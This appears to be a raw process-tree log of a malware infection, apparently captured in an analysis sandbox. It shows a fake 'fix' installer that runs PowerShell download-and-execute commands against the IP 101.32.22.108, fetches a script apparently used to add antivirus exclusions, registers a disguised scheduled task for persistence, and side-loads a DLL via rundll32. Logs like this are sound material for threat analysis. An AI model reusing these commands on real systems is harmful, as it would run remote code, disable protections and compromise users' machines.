1Htest.exe(进程ID：6996) 命令行:"c:\users\admin\appdata\local\temp\httpnetword_fix\1htest.exe"
  1htest.tmp(进程ID：5900) 命令行:"C:\Users\admin\AppData\Local\Temp\is-IKKO0.tmp\1htest.tmp" /SL5="$302FC,880128,880128,c:\users\admin\appdata\local\temp\httpnetword_fix\1htest.exe" 
    cmd.exe(进程ID：7016) 命令行:"cmd.exe" /c powershell.exe -ExecutionPolicy Bypass -Command "Invoke-RestMethod -Uri 'http://101.32.22.108/1/1h.txt' | Invoke-Expression"
      powershell.exe(进程ID：3644) 命令行:powershell.exe  -ExecutionPolicy Bypass -Command "Invoke-RestMethod -Uri 'http://101.32.22.108/1/1h.txt' | Invoke-Expression"
        powershell.exe(进程ID：1748) 命令行:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Public\Documents\1h.ps1
          cmd.exe(进程ID：3784) 命令行:C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\ExecutionHuiOne\OK.bat" "
            powershell.exe(进程ID：3224) 命令行:powershell  -Command "iwr \"http://101.32.22.108/exclusions.ps1\" -OutFile \"C:\Users\admin\AppData\Local\Temp\111.ps1\""
            powershell.exe(进程ID：1620) 命令行:powershell  -ExecutionPolicy Bypass -File "C:\Users\admin\AppData\Local\Temp\111.ps1" mimika.exe *.msi *.dll
            powershell.exe(进程ID：6852) 命令行:powershell  -ExecutionPolicy Bypass -File "C:\Users\admin\AppData\Local\Temp\111.ps1" C:\*
            schtasks.exe(进程ID：1500) 命令行:schtasks  /create /xml "C:\Program Files (x86)\ExecutionHuiOne\Entry.xml" /tn "\Microsoft\Windows\UNP\ExecutionHuiOne" /f
            schtasks.exe(进程ID：1152) 命令行:schtasks  /run /tn "\Microsoft\Windows\UNP\ExecutionHuiOne"     
            unins000.exe(进程ID：3748) 命令行:"C:\Program Files (x86)\csDemo\unins000.exe"  /VERYSILENT     
              _iu14D2N.tmp(进程ID：1564) 命令行:"C:\Users\admin\AppData\Local\Temp\_iu14D2N.tmp" /SECONDPHASE="C:\Program Files (x86)\csDemo\unins000.exe" /FIRSTPHASEWND=$60030 /VERYSILENT     
                taskkill.exe(进程ID：3628) 命令行:"taskkill" /t /f /im testApp.exe
setup安装6.exe(进程ID：7132) 命令行:"c:\users\admin\appdata\local\temp\httpnetword_fix\setup安装6.exe"
smss.exe(进程ID：2876) 命令行:"c:\users\admin\appdata\local\temp\httpnetword_fix\smss.exe"
YunDetectService.exe(进程ID：4348) 命令行:"c:\users\admin\appdata\local\temp\httpnetword_fix\yundetectservice.exe"
  rundll32.exe(进程ID：4728) 命令行:C:\windows\system32\rundll32.exe
  WerFault.exe(进程ID：6952) 命令行:C:\Windows\system32\WerFault.exe -u -p 4348 -s 212
cmd.exe(进程ID：1984) 命令行:"c:\windows\System32\cmd.exe" /c %windir%\SysWOW64\rundll32.exe %LOCALAPPDATA%\Microsoft\ExecutionHuiOne\ExecutionHuiOne.dll,EntryHUIOne
  rundll32.exe(进程ID：1064) 命令行:C:\Windows\SysWOW64\rundll32.exe  C:\Users\admin\AppData\Local\Microsoft\ExecutionHuiOne\ExecutionHuiOne.dll,EntryHUIOne
    mmgaserver.exe(进程ID：1988) 命令行:mmgaserver.exe
33J3M36.exe(进程ID：580) 命令行:C:\ProgramData\8S1LH1\33J3M36.exe
  WerFault.exe(进程ID：5336) 命令行:C:\Windows\SysWOW64\WerFault.exe -u -p 580 -s 664
33J3M36.exe(进程ID：5980) 命令行:C:\ProgramData\8S1LH1\33J3M36.exe
  WerFault.exe(进程ID：3860) 命令行:C:\Windows\SysWOW64\WerFault.exe -u -p 5980 -s 652